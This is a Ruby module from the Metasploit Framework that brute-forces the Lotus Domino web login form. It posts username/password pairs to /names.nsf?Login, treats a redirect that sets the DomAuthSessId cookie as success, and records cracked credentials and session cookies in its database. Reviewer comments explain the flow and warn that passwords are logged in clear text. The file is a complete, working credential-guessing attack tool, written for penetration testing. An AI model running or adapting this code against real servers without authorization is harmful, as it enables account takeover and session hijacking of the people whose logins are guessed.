rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
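# Auxiliary scanner that submits username/password pairs to the Lotus Domino
# web login form (POST /names.nsf?Login) and records every pair the server
# accepts through the framework's credential-reporting helpers.
#
# NOTE(review): candidate passwords are echoed in clear text by the status and
# success messages, and the full Set-Cookie value of a successful login is
# stored as proof. Console logs and the workspace database produced by a run
# should therefore be handled as sensitive material.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module's descriptive metadata with the framework.
  def initialize
    super(
      'Name' => 'Lotus Domino Brute Force Utility',
      'Description' => 'Lotus Domino Authentication Brute Force Utility',
      'Author' => 'Tiago Ferreira <tiago.ccna[at]gmail.com>',
      'License' => MSF_LICENSE
    )
  end

  # Per-host entry point: runs one login attempt for each user/password pair
  # yielded by each_user_pass.
  #
  # The block's value is whatever do_login returns (:next_user, :abort or nil);
  # presumably each_user_pass (from AuthBrute) uses it to steer the iteration;
  # confirm against the mixin.
  #
  # @param ip [String] host being scanned; not referenced in the body
  def run_host(ip)
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  # Stores a successful login as a credential plus a login record.
  #
  # @param opts [Hash] values read here: :ip, :port, :service_name, :user,
  #   :password and :proof
  # @return the result of create_credential_login
  def report_cred(opts)
    # Service coordinates shared by the credential and the login record.
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Performs a single login attempt and classifies the server's answer.
  #
  # Each attempt is exactly one POST to /names.nsf?Login carrying the
  # URI-encoded username and password.
  #
  # @param user [String, nil] username to try
  # @param pass [String, nil] password to try
  # @return [Symbol, nil] :next_user after a 302 that sets DomAuthSessId,
  #   :abort when there is no response or the response is not recognised,
  #   nil when the login page is served again or a connection error is rescued
  def do_login(user = nil, pass = nil)
    post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"
    vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'")

    begin
      # The second argument (20) is presumably a timeout in seconds; confirm
      # against send_request_cgi.
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => '/names.nsf?Login',
        'data' => post_data
      }, 20)

      # A missing response used to fall through to `res.body` and raise
      # NoMethodError; the `if res` guard on the final branch shows that nil
      # was expected to end in :abort, so handle it explicitly.
      if res.nil?
        vprint_error("http://#{vhost}:#{rport} - Lotus Domino - No response")
        return :abort
      end

      if res.code == 302
        # A redirect only counts as success when it sets the session cookie.
        if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)
          print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'")
          report_cred(
            ip: rhost,
            port: rport,
            service_name: (ssl ? "https" : "http"),
            user: user,
            password: pass,
            proof: "WEBAPP=\"Lotus Domino\", VHOST=#{vhost}, COOKIE=#{res.get_cookies}"
          )
          return :next_user
        end

        print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")
        return :abort
      elsif res.body.to_s =~ /names\.nsf\?Login/
        # The login form was served again: the pair was rejected. The dot is
        # escaped so that only the literal "names.nsf?Login" matches.
        vprint_error("http://#{vhost}:#{rport} - Lotus Domino - Failed to login as '#{user}'")
        return
      else
        print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response")
        return :abort
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
           ::Timeout::Error, ::Errno::EPIPE
      # Deliberate best-effort: connection-level failures are swallowed and the
      # attempt yields nil, exactly as the original empty rescue clauses did.
      nil
    end
  end
end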